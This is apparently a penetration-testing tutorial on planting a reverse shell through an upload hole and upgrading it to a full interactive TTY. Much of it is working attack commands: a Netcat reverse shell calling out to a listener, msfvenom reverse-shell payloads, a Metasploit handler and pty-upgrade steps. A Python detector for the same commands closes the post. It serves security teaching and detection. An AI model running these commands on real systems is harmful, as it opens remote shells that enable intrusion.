Penetration Testing Step by Step: Uploading Shellcode and Upgrading the Shell

Getting a Remote Shell

Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target.

Netcat

You could just start a Netcat listener on the attack box, if Netcat is available there:

nc -lvnp 1234

… and have the victim connect back to it with a shell, as long as the Netcat on the victim is a version that supports -e:

nc -e /bin/sh 192.168.0.10 1234

That should get you a shell, and if -e works, it’ll even be a good Bash shell.

Shellcode Resources

You can find all kinds of cool reverse shell code at Pentest Monkey:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

See these detailed instructions for a PHP reverse shell:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell.
This is a nice illustration of setting up the listener, etc.

And if you need to start with a web shell the Monkey has them here:
http://pentestmonkey.net/category/tools/web-shells

Msfvenom

But since we’re in Metasploit, it’s handy to use Metasploit’s msfvenom to generate the commands for us. Metasploit has several payloads under “cmd/unix” that can be used to generate one-liner bind or reverse shells; they live at
/usr/share/metasploit-framework/modules/payloads/singles/cmd/unix. Note that there are payloads for Windows (and mainframes, who knows why) as well.

Often your limits are what’s supported on the target.

For instance, this payload can be used if the -e flag isn’t available in Netcat:

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.10 LPORT=1234 R

And here’s a Perl example to use if Netcat isn’t installed:

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.10 LPORT=1234 R

On any msfvenom attack, you’ll need to set up a listener on the attack machine:

msf > use exploit/multi/handler
msf > set PAYLOAD <Payload name>
msf > set LHOST <LHOST value>
msf > set LPORT <LPORT value>
msf > set ExitOnSession false
msf > exploit -j -z

Once you’ve set required options, the following command will execute your handler:

msf > msfconsole -L -r

Spawn a Bash Shell from Python

This Python command will get you a real pty once you’ve got a reverse shell opened. In that shell, enter:

echo $TERM   # note the terminal type to use below (rows and columns come from "stty size" on your own terminal)

python -c 'import pty; pty.spawn("/bin/bash");'
CTRL-Z       # background the pty shell (it is suspended, not killed)

stty raw -echo

fg           # get back to our shell

reset

export SHELL=bash

export TERM=xterm-256color

stty rows 38 columns 116

The steps above are from this very nice tutorial:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/.
Also look at the socat alternative on that page.
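As an added defensive counterpart (this is not code from the post or from the ropnop tutorial): a small Python detector that scans constructed process-execution records for the commands walked through above (nc -e, the Python pty spawn, stty raw -echo) and flags hosts where more than one of them fires, which is the footprint of a reverse shell being upgraded to a full TTY. The "host=.. user=.. cmd=.." record format, host names and sample lines are assumptions.

```python
import re

# Constructed sample of process-execution records (auditd/EDR style), not real data.
SAMPLE_EVENTS = [
    "host=web01 user=www-data cmd=nc -e /bin/sh 192.168.0.10 1234",
    "host=web01 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/bash\");'",
    "host=web01 user=www-data cmd=stty raw -echo",
    "host=db01 user=postgres cmd=python -c 'import json; print(json.dumps({}))'",
    "host=db01 user=alice cmd=stty rows 38 columns 116",
]

# Rule name -> regex over the command line; each mirrors a step described on this page.
RULES = [
    ("netcat_exec_shell", re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh\b")),
    ("python_pty_spawn", re.compile(r"\bpython[23]?\b.*\bpty\.spawn\(")),
    ("stty_raw_noecho", re.compile(r"\bstty\s+raw\s+-echo\b")),
]

def parse_event(line):
    """Split a 'host=.. user=.. cmd=..' record; cmd is last and may contain spaces."""
    head, _, cmd = line.partition(" cmd=")
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["cmd"] = cmd
    return fields

def match_rules(cmd):
    """Names of all rules whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(events):
    """Map host -> list of (user, rule, cmd) hits, in log order."""
    hits = {}
    for line in events:
        ev = parse_event(line)
        for rule in match_rules(ev["cmd"]):
            hits.setdefault(ev["host"], []).append((ev["user"], rule, ev["cmd"]))
    return hits

def suspicious_hosts(events, min_rules=2):
    """Hosts on which at least min_rules distinct rules fired: a lone 'stty' is noise,
    a shell spawn followed by a TTY upgrade is worth an alert."""
    return sorted(h for h, lst in scan(events).items()
                  if len({r for _, r, _ in lst}) >= min_rules)

if __name__ == "__main__":
    for host, lst in scan(SAMPLE_EVENTS).items():
        for user, rule, cmd in lst:
            print(f"{host} {user} {rule}: {cmd}")
    print("alert:", suspicious_hosts(SAMPLE_EVENTS))
```

On the sample data only web01 is reported; the benign stty and python invocations on db01 produce no hits.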

For succinct example code for several platforms, see this great cheatsheet/page:
https://netsec.ws/?p=331

And as always check out OffSec’s own page:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
